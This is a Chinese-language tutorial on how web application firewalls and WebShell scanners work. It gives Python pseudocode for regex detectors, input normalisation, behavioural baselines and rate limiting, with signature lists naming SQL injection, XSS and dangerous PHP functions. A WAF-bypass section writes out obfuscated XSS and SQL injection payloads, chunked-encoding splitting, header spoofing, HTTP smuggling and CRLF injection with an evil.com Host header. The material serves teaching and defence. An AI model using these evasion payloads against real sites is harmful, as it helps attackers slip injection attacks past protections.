WAF基础与WebShell查杀引擎详解

第一部分:WAF基础与绕过技术

WAF防御原理

现代WAF防御体系

现代WAF已从传统规则匹配演进为AI+行为+情报的智能防御体系,核心是在流量到达应用前完成清洗与拦截。WAF工作在OSI模型的应用层(第7层),通过深度解析HTTP/HTTPS流量实现防护。

WAF架构演进

第一代:规则匹配WAF

  • 基于正则表达式匹配已知攻击特征
  • 优点:部署简单,误报率相对较低
  • 缺点:无法检测0day漏洞,容易被绕过
  • 代表产品:早期ModSecurity

第二代:语义分析WAF

  • 理解HTTP协议语义,进行上下文分析
  • 优点:能检测变形攻击,减少误报
  • 缺点:规则复杂度高,维护成本大
  • 代表产品:Imperva WAF

第三代:智能行为WAF

  • 基于机器学习建立正常流量基线
  • 优点:能检测未知攻击,自适应能力强
  • 缺点:需要大量训练数据,误报率较高
  • 代表产品:Cloudflare WAF

第四代:AI驱动WAF

  • 结合深度学习、威胁情报、虚拟补丁
  • 优点:全方位防护,实时响应0day威胁
  • 缺点:成本高,技术复杂
  • 代表产品:阿里云WAF、腾讯云WAF

WAF部署模式

反向代理模式

1
客户端 → WAF → 后端服务器
  • 优点:对后端透明,易于部署
  • 缺点:成为单点故障
  • 适用场景:中小型企业

透明网桥模式

1
客户端 → WAF(网桥) → 后端服务器
  • 优点:不改变网络架构,性能影响小
  • 缺点:配置复杂,调试困难
  • 适用场景:大型企业

DNS接入模式

1
客户端 → DNS → WAF CDN → 源站
  • 优点:全球加速,DDoS防护能力强
  • 缺点:需要修改DNS,有延迟
  • 适用场景:云服务用户

API网关模式

1
客户端 → API网关(WAF) → 微服务
  • 优点:统一管理,易于集成
  • 缺点:需要改造现有架构
  • 适用场景:微服务架构

WAF部署模式

协议深度解析

工作原理

WAF通过深度包检测技术,完整解析HTTP/HTTPS请求的各个组成部分,识别协议异常。

检测流程

  1. 协议识别:识别HTTP/HTTPS协议版本
  2. 请求解析:解析请求行、请求头、请求体
  3. 参数提取:提取URL参数、POST参数、Cookie
  4. 异常检测:检测协议异常和违规行为
  5. 标准化处理:标准化请求格式,便于后续检测

核心优势

  • 协议理解:深入理解HTTP协议语义
  • 异常检测:能检测协议层攻击
  • 全面解析:解析请求的各个组成部分
  • 标准化处理:统一处理各种请求格式

主要局限

  • 性能开销:深度解析需要较多计算资源
  • 协议复杂:HTTP协议复杂,解析困难
  • 兼容性问题:可能不兼容非标准实现
  • 绕过可能:攻击者可以利用协议漏洞绕过
应用场景

HTTP走私攻击防护

  • 检测Content-Length和Transfer-Encoding冲突
  • 识别请求拆分攻击
  • 防止后端服务器解析差异

协议异常检测

  • 检测HTTP版本异常
  • 识别非法的请求方法
  • 检测异常的请求头

请求走私防护

  • 检测请求拆分
  • 识别HTTP走私
  • 防止缓存投毒

协议降级防护

  • 防止HTTPS降级为HTTP
  • 检测SSL/TLS降级攻击
  • 保护通信安全

协议解析技术

完整解析

  • 完整解析HTTP协议
  • 理解协议语义
  • 检测协议异常

部分解析

  • 只解析关键字段
  • 提高解析速度
  • 降低性能开销

智能解析

  • 根据请求特征选择解析策略
  • 平衡准确性和性能
  • 自适应调整

请求解析流程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# WAF请求解析伪代码
class HTTPRequestParser:
def parse_request(self, raw_request):
# 解析请求行
request_line = self.parse_request_line(raw_request)
method, url, version = request_line

# 解析请求头
headers = self.parse_headers(raw_request)

# 解析Cookie
cookies = self.parse_cookies(headers.get('Cookie', ''))

# 解析请求体
body = self.parse_body(raw_request, headers.get('Content-Type'))

# 解析参数
params = self.parse_params(url, body)

return {
'method': method,
'url': url,
'headers': headers,
'cookies': cookies,
'body': body,
'params': params
}

def detect_protocol_anomalies(self, request):
# 检测HTTP走私
if self.detect_http_smuggling(request):
return True

# 检测请求拆分
if self.detect_request_splitting(request):
return True

# 检测协议版本异常
if self.detect_version_anomaly(request):
return True

return False

协议异常检测示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# HTTP走私攻击示例
POST /login HTTP/1.1
Host: example.com
Content-Length: 10
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: example.com

# WAF检测逻辑
if 'Content-Length' in headers and 'Transfer-Encoding' in headers:
# 检测到HTTP走私攻击
block_request()

静态检测技术

特征匹配引擎

特征匹配引擎通过正则表达式匹配拦截SQL注入、XSS、命令执行、文件包含等已知攻击(OWASP Top 10)。

检测流程

  1. 请求接收:接收HTTP/HTTPS请求
  2. 参数提取:提取URL参数、POST参数、Cookie、HTTP头
  3. 特征匹配:使用正则表达式匹配攻击特征
  4. 风险评估:根据匹配结果计算风险分数
  5. 决策执行:根据风险分数决定放行、拦截或告警

核心优势

  • 快速响应:毫秒级检测,对性能影响小
  • 准确率高:基于已知攻击特征,误报率低
  • 易于维护:规则库可快速更新
  • 成本较低:不需要复杂的机器学习模型

主要局限

  • 无法检测0day:只能检测已知攻击模式
  • 容易被绕过:攻击者可以通过编码、混淆绕过
  • 规则爆炸:随着攻击手段增多,规则库会变得庞大
  • 误报问题:正常业务可能触发规则

SQL注入特征匹配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
class SQLInjectionDetector:
def __init__(self):
# SQL注入特征库
self.patterns = [
r"(?i)\bunion\b.*\bselect\b",
r"(?i)\bselect\b.*\bfrom\b",
r"(?i)\binsert\b.*\binto\b",
r"(?i)\bdelete\b.*\bfrom\b",
r"(?i)\bupdate\b.*\bset\b",
r"(?i)\bdrop\b.*\btable\b",
r"(?i)\bexec\b.*\bxp_cmdshell\b",
r"(?i)'.*or.*'.*=.*'",
r"(?i)'.*and.*'.*=.*'",
r"(?i)\bor\b.*\b1\b.*=\b1\b",
r"(?i)\band\b.*\b1\b.*=\b1\b",
r"(?i);.*\bdrop\b",
r"(?i);.*\bexec\b",
r"(?i)--.*\bor\b",
r"(?i)#.*\band\b"
]

def detect(self, request):
# 检测URL参数
for param in request['url_params']:
if self.match_patterns(param['value']):
return True

# 检测POST参数
for param in request['post_params']:
if self.match_patterns(param['value']):
return True

# 检测Cookie
for cookie in request['cookies']:
if self.match_patterns(cookie['value']):
return True

return False

def match_patterns(self, value):
for pattern in self.patterns:
if re.search(pattern, value):
return True
return False

XSS特征匹配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
class XSSDetector:
def __init__(self):
# XSS特征库
self.patterns = [
r"(?i)<script[^>]*>.*?</script>",
r"(?i)javascript:",
r"(?i)on\w+\s*=",
r"(?i)fromcharcode",
r"(?i)eval\s*\(",
r"(?i)expression\s*\(",
r"(?i)vbscript:",
r"(?i)onload\s*=",
r"(?i)onerror\s*=",
r"(?i)onclick\s*=",
r"(?i)<iframe[^>]*>",
r"(?i)<object[^>]*>",
r"(?i)<embed[^>]*>",
r"(?i)document\.",
r"(?i)window\.",
r"(?i)alert\s*\(",
r"(?i)confirm\s*\(",
r"(?i)prompt\s*\("
]

def detect(self, request):
# 检测所有输入点
all_inputs = (
request['url_params'] +
request['post_params'] +
request['cookies'] +
request['headers']
)

for input_data in all_inputs:
if isinstance(input_data, dict):
value = input_data.get('value', '')
if self.match_patterns(value):
return True

return False

语义与逻辑分析

语义分析理解参数上下文,对抗编码混淆、参数污染、变形攻击。

编码规范化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
class SemanticAnalyzer:
def normalize_input(self, value):
# URL解码
value = self.url_decode(value)

# HTML实体解码
value = self.html_entity_decode(value)

# Base64解码
value = self.base64_decode(value)

# Unicode解码
value = self.unicode_decode(value)

# 十六进制解码
value = self.hex_decode(value)

return value

def url_decode(self, value):
# 多层URL解码
decoded = value
for _ in range(3): # 最多解码3层
try:
decoded = urllib.parse.unquote(decoded)
except:
break
return decoded

def html_entity_decode(self, value):
# HTML实体解码
decoded = value
for _ in range(3):
try:
decoded = html.unescape(decoded)
except:
break
return decoded

def base64_decode(self, value):
# Base64解码
try:
decoded = base64.b64decode(value).decode('utf-8')
return decoded
except:
return value

def unicode_decode(self, value):
# Unicode解码
decoded = value
for _ in range(3):
try:
decoded = decoded.encode('utf-8').decode('unicode-escape')
except:
break
return decoded

def hex_decode(self, value):
# 十六进制解码
decoded = value
for _ in range(3):
try:
decoded = bytes.fromhex(decoded).decode('utf-8')
except:
break
return decoded

参数上下文分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
class ContextAnalyzer:
def analyze_parameter_context(self, request, param_name, param_value):
# 获取参数所在位置
param_location = self.get_param_location(request, param_name)

# 获取参数类型
param_type = self.infer_param_type(param_value)

# 获取参数用途
param_usage = self.infer_param_usage(param_name, param_location)

# 根据上下文判断是否可疑
if self.is_suspicious_context(param_name, param_type, param_usage):
return True

return False

def infer_param_type(self, value):
# 推断参数类型
if re.match(r'^\d+$', value):
return 'integer'
elif re.match(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', value):
return 'email'
elif re.match(r'^https?://', value):
return 'url'
elif re.match(r'^[a-zA-Z0-9_]+$', value):
return 'identifier'
else:
return 'string'

def infer_param_usage(self, param_name, location):
# 推断参数用途
if 'id' in param_name.lower():
return 'identifier'
elif 'sql' in param_name.lower():
return 'sql_query'
elif 'cmd' in param_name.lower() or 'command' in param_name.lower():
return 'command'
elif 'file' in param_name.lower():
return 'file_path'
else:
return 'unknown'

def is_suspicious_context(self, param_name, param_type, param_usage):
# 判断上下文是否可疑
if param_usage == 'sql_query' and param_type == 'string':
# SQL查询参数包含可疑字符串
return True

if param_usage == 'command' and param_type == 'string':
# 命令参数包含可疑字符串
return True

if param_usage == 'file_path' and '..' in param_name:
# 文件路径包含目录遍历
return True

return False

动态检测技术

行为分析与机器学习

行为分析通过学习正常流量基线(访问频率、参数分布、会话逻辑),识别异常访问、爬虫、CC攻击。

检测流程

  1. 数据采集:收集HTTP请求的各种特征
  2. 特征提取:提取URL、参数、时间、IP等特征
  3. 基线建立:使用机器学习建立正常流量基线
  4. 异常检测:实时检测偏离基线的异常行为
  5. 动态调整:根据检测结果动态调整检测阈值

核心优势

  • 检测未知攻击:不依赖已知攻击特征,能检测0day
  • 自适应能力强:能自动适应业务变化
  • 误报率低:通过机器学习减少误报
  • 实时响应:能快速响应新型攻击

主要局限

  • 需要训练数据:需要大量正常流量数据训练
  • 冷启动问题:新业务上线初期误报率高
  • 计算开销大:机器学习模型需要较多计算资源
  • 可解释性差:难以解释为什么某个请求被拦截

####### 应用场景

CC攻击防护

  • 检测异常高频请求
  • 识别自动化攻击工具
  • 区分正常用户和攻击者

爬虫识别

  • 识别恶意爬虫行为
  • 保护敏感数据不被抓取
  • 允许合法爬虫访问

0day漏洞防护

  • 检测异常的参数值
  • 识别异常的访问路径
  • 发现异常的请求模式

业务逻辑防护

  • 检测异常的会话行为
  • 识别异常的业务流程
  • 防止业务逻辑漏洞

流量基线学习

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
class BehaviorAnalyzer:
def __init__(self):
self.baseline = {
'request_frequency': {},
'param_distribution': {},
'session_patterns': {},
'url_patterns': {}
}

def learn_baseline(self, requests):
# 学习请求频率基线
self.learn_request_frequency(requests)

# 学习参数分布基线
self.learn_param_distribution(requests)

# 学习会话模式基线
self.learn_session_patterns(requests)

# 学习URL模式基线
self.learn_url_patterns(requests)

def learn_request_frequency(self, requests):
# 按IP统计请求频率
ip_requests = {}
for request in requests:
ip = request['client_ip']
if ip not in ip_requests:
ip_requests[ip] = []
ip_requests[ip].append(request['timestamp'])

# 计算每个IP的平均请求频率
for ip, timestamps in ip_requests.items():
if len(timestamps) > 1:
intervals = [timestamps[i+1] - timestamps[i]
for i in range(len(timestamps)-1)]
avg_interval = sum(intervals) / len(intervals)
self.baseline['request_frequency'][ip] = avg_interval

def learn_param_distribution(self, requests):
# 学习参数值分布
param_values = {}
for request in requests:
for param in request['all_params']:
param_name = param['name']
param_value = param['value']

if param_name not in param_values:
param_values[param_name] = []
param_values[param_name].append(param_value)

# 计算参数值的统计特征
for param_name, values in param_values.items():
self.baseline['param_distribution'][param_name] = {
'unique_count': len(set(values)),
'length_mean': sum(len(v) for v in values) / len(values),
'length_std': self.calculate_std([len(v) for v in values]),
'common_values': self.get_common_values(values, 10)
}

def detect_anomaly(self, request):
# 检测请求频率异常
if self.detect_frequency_anomaly(request):
return True

# 检测参数异常
if self.detect_param_anomaly(request):
return True

# 检测会话异常
if self.detect_session_anomaly(request):
return True

# 检测URL异常
if self.detect_url_anomaly(request):
return True

return False

def detect_frequency_anomaly(self, request):
# 检测请求频率异常
ip = request['client_ip']
if ip in self.baseline['request_frequency']:
baseline_interval = self.baseline['request_frequency'][ip]
current_interval = request['timestamp'] - self.last_request_time.get(ip, 0)

# 如果当前请求间隔远小于基线间隔
if current_interval < baseline_interval * 0.1:
return True

self.last_request_time[ip] = request['timestamp']
return False

机器学习模型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
class MLBasedDetector:
def __init__(self):
# 训练特征提取器
self.feature_extractor = FeatureExtractor()

# 训练分类模型
self.model = self.train_model()

def extract_features(self, request):
# 提取请求特征
features = {
# URL特征
'url_length': len(request['url']),
'url_param_count': len(request['url_params']),
'url_special_char_count': self.count_special_chars(request['url']),

# 参数特征
'post_param_count': len(request['post_params']),
'cookie_count': len(request['cookies']),
'param_value_length_mean': self.calculate_param_value_mean(request),

# HTTP头特征
'header_count': len(request['headers']),
'user_agent_length': len(request['headers'].get('User-Agent', '')),

# 请求方法特征
'method': self.encode_method(request['method']),

# 内容类型特征
'content_type': self.encode_content_type(request['headers'].get('Content-Type', '')),

# 时间特征
'hour': request['timestamp'].hour,
'day_of_week': request['timestamp'].weekday()
}
return features

def predict(self, request):
# 提取特征
features = self.extract_features(request)

# 预测
prediction = self.model.predict([features])[0]

# 获取预测概率
probability = self.model.predict_proba([features])[0][1]

return {
'is_malicious': prediction == 1,
'confidence': probability
}

def train_model(self):
# 训练机器学习模型
# 使用随机森林分类器
from sklearn.ensemble import RandomForestClassifier

model = RandomForestClassifier(
n_estimators=100,
max_depth=10,
random_state=42
)

# 加载训练数据
X_train, y_train = self.load_training_data()

# 训练模型
model.fit(X_train, y_train)

return model

虚拟补丁技术

工作原理

虚拟补丁针对0day漏洞快速下发临时规则,无需修改应用代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
class VirtualPatching:
def __init__(self):
self.patches = []
self.load_patches()

def load_patches(self):
# 加载虚拟补丁规则
self.patches = [
{
'name': 'CVE-2021-44228',
'description': 'Log4j远程代码执行漏洞',
'pattern': r'jndi:(?:ldap[s]?|rmi|dns|iiop):',
'action': 'block'
},
{
'name': 'CVE-2020-1472',
'description': 'Zerologon漏洞',
'pattern': r'\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff',
'action': 'block'
}
]

def check_vulnerability(self, request):
# 检查请求是否触发虚拟补丁
for patch in self.patches:
if re.search(patch['pattern'], request['url'] + request['body']):
return {
'detected': True,
'patch': patch['name'],
'description': patch['description'],
'action': patch['action']
}
return {'detected': False}

CC与爬虫防护

工作原理

CC攻击防护通过限制访问频率、识别爬虫行为、人机验证等方式,防止恶意请求。

检测流程

  1. 频率监控:监控单个IP的请求频率
  2. 行为分析:分析访问行为模式
  3. 人机验证:对可疑请求进行验证
  4. 频率控制:限制异常高频请求
  5. 黑白名单:管理IP黑白名单

核心优势

  • 防护CC攻击:有效防止CC攻击
  • 识别爬虫:识别恶意爬虫行为
  • 保护资源:保护服务器资源
  • 灵活配置:支持灵活的配置策略

主要局限

  • 误报问题:正常用户可能被误判
  • 性能开销:需要额外的计算资源
  • 绕过可能:攻击者可以使用代理绕过
  • 配置复杂:需要合理配置阈值

应用场景

CC攻击防护

  • 限制单个IP的请求频率
  • 识别异常高频请求
  • 防止服务器资源耗尽

爬虫识别

  • 识别恶意爬虫行为
  • 保护敏感数据不被抓取
  • 允许合法爬虫访问

API防护

  • 限制API调用频率
  • 防止API滥用
  • 保护API资源

频率控制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
class RateLimiter:
def __init__(self):
self.ip_requests = {}
self.rules = {
'default': {'max_requests': 100, 'time_window': 60},
'strict': {'max_requests': 10, 'time_window': 60},
'loose': {'max_requests': 1000, 'time_window': 60}
}

def check_rate_limit(self, ip, rule='default'):
# 检查IP是否超过频率限制
current_time = time.time()

# 初始化IP请求记录
if ip not in self.ip_requests:
self.ip_requests[ip] = []

# 清理过期记录
self.ip_requests[ip] = [
timestamp for timestamp in self.ip_requests[ip]
if current_time - timestamp < self.rules[rule]['time_window']
]

# 检查是否超过限制
if len(self.ip_requests[ip]) >= self.rules[rule]['max_requests']:
return False

# 记录当前请求
self.ip_requests[ip].append(current_time)
return True

威胁情报联动

工作原理

威胁情报联动通过集成外部威胁情报源,实时更新攻击特征库,提高检测准确率。

检测流程

  1. 情报收集:收集外部威胁情报
  2. 情报分析:分析威胁情报数据
  3. 规则更新:更新检测规则
  4. 实时检测:实时检测威胁
  5. 响应处置:根据威胁等级进行处置

核心优势

  • 实时更新:实时更新威胁情报
  • 提高准确率:提高检测准确率
  • 快速响应:快速响应新型威胁
  • 联动防护:与其他安全产品联动

主要局限

  • 依赖外部:依赖外部威胁情报源
  • 延迟问题:情报更新可能有延迟
  • 误报问题:可能产生误报
  • 成本问题:需要购买威胁情报服务

应用场景

恶意IP防护

  • 识别恶意IP地址
  • 阻止恶意IP访问
  • 保护服务器安全

恶意域名防护

  • 识别恶意域名
  • 阻止恶意域名访问
  • 防止DNS劫持

恶意文件防护

  • 识别恶意文件
  • 阻止恶意文件上传
  • 防止文件上传攻击

威胁情报源

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
class ThreatIntelligence:
def __init__(self):
self.sources = [
'Aliyun Threat Intelligence',
'Tencent Threat Intelligence',
'VirusTotal',
'AbuseIPDB',
'Spamhaus'
]
self.malicious_ips = set()
self.malicious_domains = set()
self.malicious_files = set()

def update_intelligence(self):
# 更新威胁情报
for source in self.sources:
# 从威胁情报源获取数据
data = self.fetch_intelligence(source)

# 更新恶意IP列表
self.malicious_ips.update(data.get('malicious_ips', []))

# 更新恶意域名列表
self.malicious_domains.update(data.get('malicious_domains', []))

# 更新恶意文件列表
self.malicious_files.update(data.get('malicious_files', []))

def check_threat(self, request):
# 检查请求是否包含威胁
threats = []

# 检查IP
if request['client_ip'] in self.malicious_ips:
threats.append({
'type': 'malicious_ip',
'value': request['client_ip'],
'severity': 'high'
})

# 检查域名
for header_name, header_value in request['headers'].items():
if header_name.lower() in ['host', 'referer']:
if header_value in self.malicious_domains:
threats.append({
'type': 'malicious_domain',
'value': header_value,
'severity': 'high'
})

# 检查文件
if 'file' in request:
if request['file']['hash'] in self.malicious_files:
threats.append({
'type': 'malicious_file',
'value': request['file']['name'],
'severity': 'high'
})

return threats

WAF绕过技术

基础绕过技术

大小写绕过

1
2
3
4
5
6
# 原始请求
GET /search?q=<script>alert(1)</script>

# 大小写绕过
GET /search?q=<SCRIPT>alert(1)</SCRIPT>
GET /search?q=<ScRiPt>alert(1)</ScRiPt>

编码绕过

1
2
3
4
5
6
7
8
# URL编码
GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E

# 双重URL编码
GET /search?q=%253Cscript%253Ealert(1)%253C/script%253E

# Unicode编码
GET /search?q=\u003cscript\u003ealert(1)\u003c/script\u003e

注释绕过

1
2
3
4
5
# SQL注入注释绕过
GET /user?id=1'/**/UNION/**/SELECT/**/username,password/**/FROM/**/users

# XSS注释绕过
GET /search?q=<script>/**/alert(1)/**/</script>

空格绕过

1
2
3
4
5
# 使用Tab代替空格
GET /search?q=<script> alert(1)</script>

# 使用/**/代替空格
GET /search?q=<script>/**/alert(1)/**/</script>

特殊字符绕过

1
2
3
4
5
# 使用%0a代替空格
GET /search?q=<script>%0aalert(1)%0a</script>

# 使用%0b代替空格
GET /search?q=<script>%0balert(1)%0b</script>

协议层绕过

HTTP方法绕过

1
2
3
4
# 使用不常见的HTTP方法
OPTIONS /search?q=<script>alert(1)</script>
TRACE /search?q=<script>alert(1)</script>
HEAD /search?q=<script>alert(1)</script>

Content-Type绕过

1
2
3
4
5
# 修改Content-Type
POST /upload HTTP/1.1
Content-Type: image/jpeg

[恶意代码]

分块传输绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 使用分块传输编码
POST /upload HTTP/1.1
Transfer-Encoding: chunked

4
<scr
5
ipt>a
6
lert(1
6
)</scr
4
ipt>
0

HTTP头绕过

1
2
3
4
5
6
7
# 使用X-Forwarded-For绕过IP限制
GET /admin HTTP/1.1
X-Forwarded-For: 127.0.0.1

# 使用User-Agent绕过检测
GET /search?q=<script>alert(1)</script>
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)

参数污染绕过

多个同名参数

1
2
3
4
# 参数污染绕过
GET /search?q=<script>&q>alert(1)</script>

# WAF只检测第一个参数,后端使用第二个参数

参数顺序绕过

1
2
3
4
# 参数顺序绕过
GET /search?q=1&id=<script>alert(1)</script>

# WAF检测q参数,后端使用id参数

时间差绕过

延迟攻击

1
2
3
4
5
6
7
8
9
10
# 延迟攻击绕过WAF
import time

# 发送正常请求建立信任
for i in range(100):
requests.get('http://example.com/normal')
time.sleep(1)

# 发送恶意请求
requests.get('http://example.com/vulnerable?payload=<script>alert(1)</script>')

慢速攻击

1
2
3
4
5
6
7
8
9
# 慢速攻击绕过WAF
import time

# 发送慢速请求
response = requests.post(
'http://example.com/upload',
data={'file': malicious_file},
timeout=300 # 5分钟超时
)

高级绕过技术

HTTP走私攻击

1
2
3
4
5
6
7
8
9
10
# HTTP走私攻击
POST /login HTTP/1.1
Host: example.com
Content-Length: 10
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: example.com

请求拆分攻击

1
2
# 请求拆分攻击
GET /search?q=foo%0d%0aHost:%20evil.com%0d%0a%0d%0a HTTP/1.1

协议降级攻击

1
2
# 协议降级攻击
GET /search?q=<script>alert(1)</script> HTTP/1.0

Host头攻击

1
2
3
# Host头攻击
GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: evil.com

第二部分:WebShell查杀引擎与绕过技术

WebShell查杀引擎原理

现代WebShell查杀引擎

现代WebShell查杀引擎已从简单的特征匹配演进为AI+行为+沙箱的智能检测体系,核心是在文件执行前或执行过程中识别恶意代码。WebShell查杀引擎工作在服务器文件系统和内存层面,通过深度分析代码实现防护。

查杀引擎架构演进

第一代:特征匹配引擎

  • 基于正则表达式匹配已知WebShell特征
  • 优点:部署简单,误报率相对较低
  • 缺点:无法检测0day WebShell,容易被绕过
  • 代表产品:早期D盾

第二代:语义分析引擎

  • 理解代码语义,进行上下文分析
  • 优点:能检测变形WebShell,减少误报
  • 缺点:规则复杂度高,维护成本大
  • 代表产品:阿里伏魔引擎

第三代:智能行为引擎

  • 基于机器学习建立正常代码行为基线
  • 优点:能检测未知WebShell,自适应能力强
  • 缺点:需要大量训练数据,误报率较高
  • 代表产品:腾讯HIDS

第四代:AI驱动引擎

  • 结合深度学习、沙箱技术、污点追踪
  • 优点:全方位防护,实时响应新型WebShell
  • 缺点:成本高,技术复杂
  • 代表产品:阿里云WebShell检测、腾讯云主机安全

查杀引擎部署模式

文件系统扫描模式

1
定时扫描 → 文件系统 → 检测引擎 → 告警/隔离
  • 优点:全面扫描,不遗漏
  • 缺点:性能开销大,实时性差
  • 适用场景:定期安全检查

实时监控模式

1
文件创建/修改 → 监控系统 → 检测引擎 → 告警/隔离
  • 优点:实时检测,响应快速
  • 缺点:性能开销大
  • 适用场景:生产环境

内存监控模式

1
代码执行 → 内存监控 → 检测引擎 → 告警/终止
  • 优点:检测加密WebShell,实时性强
  • 缺点:技术复杂,性能开销大
  • 适用场景:高安全要求环境

混合模式

1
文件系统扫描 + 实时监控 + 内存监控
  • 优点:全面防护,检测准确率高
  • 缺点:成本高,性能开销大
  • 适用场景:企业级安全防护

静态检测技术

特征匹配引擎

特征匹配引擎通过正则表达式匹配拦截eval、assert、system等危险函数。

检测流程

  1. 文件接收:接收PHP文件
  2. 代码提取:提取PHP代码
  3. 特征匹配:使用正则表达式匹配危险函数
  4. 风险评估:根据匹配结果计算风险分数
  5. 决策执行:根据风险分数决定放行、告警或隔离

核心优势

  • 快速响应:毫秒级检测,对性能影响小
  • 准确率高:基于已知WebShell特征,误报率低
  • 易于维护:规则库可快速更新
  • 成本较低:不需要复杂的机器学习模型

主要局限

  • 无法检测0day:只能检测已知WebShell模式
  • 容易被绕过:攻击者可以通过编码、混淆绕过
  • 规则爆炸:随着WebShell变种增多,规则库会变得庞大
  • 误报问题:正常代码可能触发规则

危险函数匹配

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
class DangerousFunctionDetector:
def __init__(self):
# 危险函数特征库
self.patterns = [
r'eval\s*\(',
r'assert\s*\(',
r'system\s*\(',
r'exec\s*\(',
r'passthru\s*\(',
r'shell_exec\s*\(',
r'popen\s*\(',
r'proc_open\s*\(',
r'create_function\s*\(',
r'preg_replace.*\/e',
r'include\s*\(',
r'require\s*\(',
r'include_once\s*\(',
r'require_once\s*\(',
r'file_put_contents\s*\(',
r'file_get_contents\s*\(',
r'fopen\s*\(',
r'fwrite\s*\(',
r'move_uploaded_file\s*\(',
r'array_map\s*\(',
r'array_filter\s*\(',
r'array_reduce\s*\(',
r'array_walk\s*\(',
r'usort\s*\(',
r'uasort\s*\(',
r'uksort\s*\(',
r'call_user_func\s*\(',
r'call_user_func_array\s*\(',
r'register_shutdown_function\s*\(',
r'register_tick_function\s*\(',
r'set_error_handler\s*\(',
r'set_exception_handler\s*\(',
r'spl_autoload_register\s*\(',
r'ini_set\s*\(',
r'ini_alter\s*\(',
r'ini_restore\s*\(',
r'dl\s*\(',
r'pfsockopen\s*\(',
r'fsockopen\s*\(',
r'socket_create\s*\(',
r'stream_socket_client\s*\(',
r'curl_init\s*\(',
r'curl_exec\s*\(',
r'curl_multi_exec\s*\(',
r'parse_url\s*\(',
r'parse_str\s*\(',
r'unserialize\s*\(',
r'serialize\s*\(',
r'var_dump\s*\(',
r'print_r\s*\(',
r'var_export\s*\(',
r'highlight_file\s*\(',
r'show_source\s*\(',
r'phpinfo\s*\('
]

def detect(self, file_content):
# 检测文件内容
for pattern in self.patterns:
if re.search(pattern, file_content):
return True
return False

语义与逻辑分析

语义分析理解代码上下文,对抗编码混淆、变形攻击。

代码规范化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
class CodeNormalizer:
def normalize_code(self, code):
# 移除注释
code = self.remove_comments(code)

# 移除空白字符
code = self.remove_whitespace(code)

# 规范化变量名
code = self.normalize_variable_names(code)

# 规范化函数名
code = self.normalize_function_names(code)

return code

def remove_comments(self, code):
# 移除单行注释
code = re.sub(r'//.*?\n', '\n', code)

# 移除多行注释
code = re.sub(r'/\*.*?\*/', '', code, flags=re.DOTALL)

return code

def remove_whitespace(self, code):
# 移除多余的空白字符
code = re.sub(r'\s+', ' ', code)
code = code.strip()

return code

def normalize_variable_names(self, code):
# 规范化变量名
# 将所有变量名转换为小写
code = re.sub(r'\$([a-zA-Z_][a-zA-Z0-9_]*)', lambda m: '$' + m.group(1).lower(), code)

return code

def normalize_function_names(self, code):
# 规范化函数名
# 将所有函数名转换为小写
code = re.sub(r'\b([a-zA-Z_][a-zA-Z0-9_]*)\s*\(', lambda m: m.group(1).lower() + '(', code)

return code

代码上下文分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
class CodeContextAnalyzer:
def analyze_function_context(self, code, function_name):
# 获取函数定义
function_def = self.get_function_definition(code, function_name)

# 获取函数调用
function_calls = self.get_function_calls(code, function_name)

# 获取函数参数
function_params = self.get_function_params(code, function_name)

# 根据上下文判断是否可疑
if self.is_suspicious_function(function_name, function_calls, function_params):
return True

return False

def is_suspicious_function(self, function_name, function_calls, function_params):
# 判断函数是否可疑
if function_name in ['eval', 'assert', 'system']:
# 危险函数
return True

